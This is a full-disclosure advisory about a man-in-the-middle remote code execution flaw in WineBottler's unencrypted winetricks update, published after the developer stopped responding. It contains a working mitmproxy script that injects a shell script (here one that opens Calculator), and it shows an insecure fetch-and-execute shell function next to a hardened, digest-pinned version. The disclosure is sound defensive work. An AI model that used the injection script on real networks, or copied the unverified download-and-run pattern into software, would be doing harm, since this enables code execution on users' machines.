
List:       full-disclosure
Subject:    [FD] Man in the Middle Remote Code Execution Vulnerability in WineBottler and its Bundles
From:       Bogner Florian <Florian.Bogner () kapsch ! net>
Date:       2016-10-17 9:36:54
Message-ID: C15A16F0-1346-4919-AB0F-63A1F747E1DA () kapsch ! net

Man in the Middle Remote Code Execution Vulnerability in WineBottler and its Bundles

Metadata
===================================================
Release Date: 17-10-2016
Author: Florian Bogner // Kapsch BusinessCom AG (https://www.kapsch.net/kbc)
Affected product: WineBottler (http://winebottler.kronenberg.org/)
Affected versions: all versions up to and including 1.8-rc4 (the current version at the time of writing)
Tested on: OS X El Capitan 10.11.6
CVE : product not covered
URL: https://bogner.sh/2016/10/man-in-the-middle-remote-code-execution-vulnerability-in-winebottler-and-its-bundles/
                
Video: https://youtu.be/nwcZIn2s6Vc
Vulnerability Status: No patch available - developer became unresponsive after promising to fix the issue

Product Description
===================================================
WineBottler packages Windows-based programs like browsers, media players, games or business applications snugly into Mac app bundles.

Vulnerability Description
===================================================
Whenever WineBottler is launched it tries to update the bundled winetricks (https://github.com/Winetricks/winetricks) helper script. This update is carried out over unencrypted HTTP (a GET request to http://winetricks.org/winetricks), so an attacker with man-in-the-middle capabilities on the network path can replace the downloaded winetricks.sh shell script with one of their own; nothing in the download detects the substitution. Because the downloaded script is executed immediately, this is a reliable man-in-the-middle remote code execution vulnerability: whoever controls the HTTP response controls what runs in the context of the user who launched WineBottler.

The issue also affects all the bundles created with WineBottler. However, I think it can only be abused on their first launch. This greatly limits the attack surface.

PoC
===================================================
1.) Set up an HTTP proxy like Burp (https://portswigger.net/burp/)
2.) Redirect all HTTP traffic from the victim machine to this proxy
3.) Launch WineBottler
4.) Modify the response to the GET request for http://winetricks.org/winetricks so that it returns a shell script of your choosing
5.) Remote code execution has been gained: WineBottler executes the injected script

The following mitmproxy (https://mitmproxy.org/index.html) script "drunken-winebottler.py" can be used to automate the attack. The real server answers the GET with a 301 redirect; the script swaps that redirect for a 200 response whose body is the payload. It is written against the mitmproxy 0.x inline-script API (a response(context, flow) hook and the mitmproxy.models.decoded helper); later mitmproxy releases dropped both, so it needs adapting for current versions:

from mitmproxy.models import decoded

NEWLINE = '\r\n'

def response(context, flow):
    # Only touch the winetricks update request, which the server answers with a 301.
    if (flow.request.url == "http://winetricks.org/winetricks"
            and flow.response.status_code == 301
            and flow.request.method == "GET"):
        flow.response.status_code = 200  # overwrite 301 status code with 200

        with decoded(flow.response):  # automatically decode gzipped responses.
            flow.response.content = ""  # replace original script to launch Calculator.app
            flow.response.content += '#!/bin/sh' + NEWLINE
            flow.response.content += '/usr/bin/open /Applications/Calculator.app'

Disclosure Timeline
===================================================
29.5.2016: The issue was discovered
30.5.2016: Tried to establish initial contact with the developer using Facebook
31.5.2016: Requested a CVE number; retried to contact the developer using Facebook
1.6.2016: MITRE declined to assign a CVE: the product is not covered
2.6.2016: Created this documentation; sent it to the developer by mail
18.6.2016: Developer responded on Facebook
20.6.2016: Developer promised that the winetricks update will be switched to HTTPS. Agreed on 29.7. as the public disclosure date
25.7.2016: Tried to contact the developer as no new version had been released – no success
29.7.2016: Initially agreed public disclosure date – rescheduled
31.7.2016: Tried again to contact the developer – again no success
13.8.2016: Tried a last time to get in touch with the developer – again no success
17.10.2016: Public disclosure although unfixed: the developer has been unresponsive for several months

Suggested Solution
===================================================
All requests should be carried out over an encrypted and authenticated channel, i.e. HTTPS with certificate validation left enabled (a silent fallback to HTTP, or a redirect that leaves HTTPS, would keep the attack alive). Verifying a pinned checksum or signature of the downloaded script before executing it would additionally protect against a compromised server, which TLS alone does not. The author already mentioned (https://mike.kronenberg.org/winebottler-1-7-52/) that he is planning to switch to HTTPS in the future. Yet, right now there is no patch available.

The only workaround would be to block outgoing (HTTP) connections - however, whenever I tried that WineBottler stalled...
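To make the suggested fix concrete, here is an added example (it is not WineBottler's or winetricks' code, and the advisory does not say how WineBottler actually performs the download) that puts the fetch-and-run pattern described above next to a hardened variant: HTTPS enforced for the URL and any redirect target, certificate validation kept on, and the downloaded script executed only after its SHA-256 matches a digest pinned in the application. curl, the file paths and the function names are assumptions for illustration; the demonstration at the end uses a constructed stand-in for the downloaded script so it runs offline.

```shell
#!/bin/sh
# Added example, not WineBottler's or winetricks' code.  curl, the paths and
# the function names are assumptions for illustration only.

# Vulnerable pattern: plain HTTP, redirects followed blindly, result executed
# at once.  Whoever answers the GET (e.g. a man in the middle) chooses what runs.
update_winetricks_insecure() {
    url="$1"; dest="$2"
    curl -fsSL "$url" -o "$dest" && sh "$dest"
}

# Portable SHA-256 helper: GNU coreutils on Linux, shasum on macOS.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Execute $1 only if its SHA-256 equals the pinned digest $2 (shipped with the
# app, obtained out of band from the release).  Returns 0 if the script ran,
# 1 if the digest mismatched (the script is NOT run), 2 if the file is missing.
verify_and_run() {
    script="$1"; expected="$2"
    [ -f "$script" ] || return 2
    actual=$(sha256_of "$script")
    if [ "$actual" != "$expected" ]; then
        echo "refusing to run $script: sha256 $actual != pinned $expected" >&2
        return 1
    fi
    sh "$script"
}

# Hardened pattern: HTTPS only for the URL (--proto) and for any redirect
# target (--proto-redir), HTTP errors fatal (-f), certificate validation left
# on (no -k/--insecure), and the download executed only after the pinned digest
# matches.  Returns 3 if the transfer fails, otherwise verify_and_run's status.
update_winetricks_hardened() {
    url="$1"; dest="$2"; pinned="$3"
    curl -fsSL --proto '=https' --proto-redir '=https' "$url" -o "$dest" || return 3
    verify_and_run "$dest" "$pinned"
}

# Offline demonstration with a constructed stand-in for the downloaded script:
# the genuine copy runs, a substituted copy (what the MITM delivers) is refused.
demo() {
    tmp=$(mktemp -d)
    printf '#!/bin/sh\necho "winetricks stub: genuine script running"\n' > "$tmp/winetricks"
    pinned=$(sha256_of "$tmp/winetricks")        # the digest the app would ship
    verify_and_run "$tmp/winetricks" "$pinned"    # digest matches: script runs
    printf '#!/bin/sh\necho "ATTACKER PAYLOAD"\n' > "$tmp/winetricks"
    if ! verify_and_run "$tmp/winetricks" "$pinned"; then
        echo "substituted script was blocked"
    fi
    rm -rf "$tmp"
}

demo
```

The pinned digest has to come from somewhere trustworthy (the app bundle itself, or a signed manifest fetched separately); pinning the digest next to the script on the same HTTP endpoint would give the attacker both and defeat the check.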


Florian Bogner | Security Solutions
ICT Technology Solutions
Mobile +43 664 628 5491 | florian.bogner@kapsch.net

Kapsch BusinessCom AG | Wienerbergstrasse 53 | 1120 Wien | Österreich
www.kapschbusiness.com | www.kapsch.net
Commercial register: Commercial Court Vienna FN 178368g | Registered office: Vienna
